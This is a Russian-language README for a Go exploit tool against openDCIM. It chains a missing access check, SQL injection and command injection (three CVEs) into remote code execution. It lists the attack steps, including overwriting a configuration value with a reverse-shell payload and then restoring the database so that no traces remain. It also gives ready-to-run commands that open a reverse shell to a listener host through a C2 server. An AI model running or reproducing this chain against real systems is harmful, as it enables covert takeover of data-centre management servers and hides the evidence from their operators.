
openDCIM install.php SQLi to RCE цепочка (CWE-862 + CWE-89 + CWE-78)
Цепочка удаленного выполнения кода, нацеленная на форму конфигурации LDAP install.php в openDCIM. Создана на основе фреймворка VulnCheck go-exploit.
| # | CVE | CWE | Описание |
|---|---|---|---|
| 1 | CVE-2026-28515 | CWE-862 | install.php не выполняет проверку ролей перед формой конфигурации LDAP — любой пользователь может получить к ней доступ |
| 2 | CVE-2026-28516 | CWE-89 | Config::UpdateParameter() использует интерполяцию строк, составные запросы через PDO+MySQL |
| 3 | CVE-2026-28517 | CWE-78 | report_network_map.php передает значение конфигурации dot напрямую в exec() |
Затронуты: Все версии (протестировано на последнем коммите 4467e9c4)
install.php — SQL-инъекция через форму LDAP создает резервную копию конфигурации, перезаписывает dot командой полезной нагрузкиreport_network_map.php — запускает exec(), подтверждает RCE через вывод idinstall.php — перезаписывает dot полезной нагрузкой обратной оболочкиreport_network_map.php — запускает обратную оболочкуinstall.php — восстанавливает все исходные значения конфигурации из резервной таблицыПосле эксплуатации в базе данных не остается никаких следов.
go build -o opendcim-exploit .
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80
# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer
| Флаг | По умолчанию | Описание |
|---|
-rhost | Целевой хост | |
-rport | 80 | Целевой порт |
-ssl | false | Использовать HTTPS |
-lhost | Хост-прослушиватель (для обратной оболочки) | |
-lport | Порт-прослушиватель (для обратной оболочки) | |
-c2 | Тип C2: SimpleShellServer или SSLShellServer | |
-username | Имя пользователя HTTP Basic Auth (опустите для развертываний SetEnv) | |
-password | Пароль HTTP Basic Auth (опустите для развертываний SetEnv) | |
-a | Обнаружение активов (проверка, эксплуатируема ли цель) | |
-e | Режим эксплуатации |